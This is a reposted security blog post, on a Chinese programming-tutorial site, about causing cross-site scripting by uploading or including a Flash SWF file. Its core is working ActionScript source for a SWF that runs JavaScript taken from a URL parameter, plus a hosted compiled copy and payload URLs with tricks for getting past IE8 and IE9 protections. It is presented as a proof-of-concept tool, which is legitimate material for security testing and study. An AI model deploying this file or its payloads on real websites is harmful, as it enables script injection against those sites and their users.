好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

XSS by uploading/including a SWF file - 网站安全 - 自学

On November 12, 2012, in Security Articles, Security Posts, by Soroush Dalili

As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to represent this SWF file that you can use in your PoCs.

 

This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either.

 

Note: IE has a protection to make the [document] object inaccessible when you open a SWF directly in a browser. I have bypassed IE8 protection by using a simple redirection in Java script. I have also found a noisy way to bypass IE9 protection by opening a new window (you may be able to do it in a less noisy way – please leave your comments if you know any other bypass method).

 

Here is the actionscript code:

 

package { import flash.display.Sprite; import flash.external.*; import flash.system.System; public class XSSProject extends Sprite { public function XSSProject() { flash.system.Security.allowDomain("*"); ExternalInterface.marshallExceptions = true; try { ExternalInterface.call("0);}catch(e){};"+root.loaderInfo.parameters.js+"///*PoC by Soroush Dalili @IRSDL - only for testing/educational purposes - He accepts no responsibility for any bad/malicious usage*/"); } catch(e:Error) { trace(e); } } } }  

Compiled file is accessbile via: http://0me.me/demo/xss/xssproject.swf

 

Examples:

 

Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);

 

IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);}

 

IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);

 

References:

 

[1] The other reason to beware ExternalInterface.call() (URL: http://lcamtuf.blogspot.co.uk/2011/03/other-reason-to-beware-of. html )

 

[2] Flash ExternalInterface.call() JavaScript Injection – can make the websites vulnerable to XSS (URL:http://soroush.secproject.com/blog/2011/03/flash-externalinterface-call-javascript-injection-%E2%80%93-can-make-the-websites-vulnerable-to-xss/)

 

from:http://soroush.secproject.com/blog/2012/11/xss-by-uploadingincluding-a-swf-file/

查看更多关于XSS by uploading/including a SWF file - 网站安全 - 自学的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did14942
  阅读:44次

上一篇: XSS平台部署文档 - 网站安全 - 自学php

下一篇:ecshop绕过验证码暴力破解 - 网站安全 - 自学php

相关资讯